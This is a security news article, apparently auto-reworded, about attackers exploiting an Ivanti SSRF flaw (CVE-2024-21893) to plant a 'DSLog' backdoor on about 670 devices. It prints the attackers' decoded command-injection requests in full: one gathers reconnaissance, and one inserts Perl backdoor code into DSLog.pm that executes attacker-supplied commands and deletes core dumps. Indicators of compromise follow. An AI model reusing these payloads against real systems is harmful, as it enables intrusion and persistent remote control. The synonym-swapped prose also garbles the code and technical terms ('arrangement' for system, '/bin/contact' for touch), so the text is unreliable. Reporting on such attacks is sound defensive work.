Hackers Inject DSLog Malware to 670 Devices Using Ivanti SSRF Flaw Exploit
Ivanti Connect Ranking was as soon as previously chanced on with yet every other SSRF vulnerability that could perhaps presumably moreover allow unauthenticated menace actors to entry unrestricted resources because of the a flaw within the SAML module. The vulnerability was as soon as assigned with CVE-2024-21893, and the severity was as soon as 8.2 (High).
Moreover, this vulnerability was as soon as previously reported to be exploited by menace actors within the wild genuine thru disclosure. Nonetheless, newest reports place that menace actors enjoy leveraged this vulnerability to put in a previously unknown and appealing “DSLog backdoor” on vulnerable devices.
Orange Cyberdefense detected 670 compromised resources that attackers injected backdoor the use of a SAML vulnerability. This equipped the attacker with power distant entry.
How discontinue Hackers Bypass 2FA?
Dwell attack simulation Webinar demonstrates varied methods wherein story takeover can occur and practices to present protection to your web sites and APIs in opposition to ATO attacks .
Hackers Exploiting Ivanti SSRF Flaw
In accordance to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that menace actors exploit by injecting a backdoor with affirm injection. This backdoor was as soon as accessed and controlled with a standard “API Key” mechanism.
Preliminary search files from
Throughout the initial portion of the attack, menace actors ship an unauthenticated SAML authentication search files from that contains an encoded affirm with “RetrievalMethod URI.” The search files from was as soon as identified to be a URL-encoded search files from containing a base64 encoded affirm alongside the URI.
Decoding the search files from for URL and base64 offers the next line of affirm outdated by menace actors for exploitation.
http://127.0.0.1:8090/api/v1/license/keys-living/;echo echo $(uname – a;identification)>/dwelling/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash; |
This affirm gathers inner reconnaissance files and stores it into a file named “index2.txt” the use of the ‘echo’ affirm line tool. The encoded strings are moreover decoded the use of the base64 decode utility and bash affirm interpreter.
Backdoor Installation
Once the above affirm is carried out efficiently, the menace actors then try and install the backdoor on the vulnerable tool the use of the same strategy of URL and Base64 encoding of instructions. The search files from is as follows:
http://127.0.0.1:8090/api/v1/license/keys-living/;echo mount -o remount,rw / DESTFILE=”/dwelling/perl/DSLog.pm” CLFILE=”/dwelling/perl/DSLogMB.pm” if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then echo ‘OK’; else sed -i ‘102i\ my $ua = $ENV{HTTP_USER_AGENT};n my $req = $ENV{QUERY_STRING};n my $qur = ”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7”;n my @param = split(/&/, $req);n if (index($ua, $qur) != -1) {n if ($param[1]){n my @res = split(/=/, $param[1]);n if ($res[0] eq ”cdi”){n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;n $res[1] =~ tr/!-~/P-~!-O/;n arrangement(${res[1]});n }n }n }’ $DESTFILE fi /bin/contact -r $CLFILE $DESTFILE rm -rf /var/cores/* /dwelling/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d | /bin/bash; |
This backdoor affirm is carried out on the compromised tool, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module to blame for logging authenticated web requests and web requests and arrangement logs on the tool.
Orange Cyber Protection offers a complete breakdown of the backdoor, affirm execution, methodologies, and assorted technical facts for these with a tough technical background.
Indicators of Compromise
Host-based IoC
Route + filename | Hash | Description |
/root/dwelling/perl/DSLog[.]pm | N/A – varies | Legitimate DSLog Log module embedding the |
/root/dwelling/webserver/htdocs/danana/imgs/index[.]txt | N/A – varies | backdoor |
/root/dwelling/webserver/htdocs/danana/imgs/index1[.]txt | N/A – varies | Some appear to be random characters. |
/root/dwelling/webserver/htdocs/danana/imgs/index2[.]txt | N/A – varies | Some appear to be random characters. |
/root/dwelling/webserver/htdocs/danana/imgs/mark[.]png | Embedding the consequence of ‘uname -a’ |
Community-based IoC
Community Indicator | Kind | Description |
159.65.123.122 | IP Address | Huge exploitation job |
Source credit : cybersecuritynews.com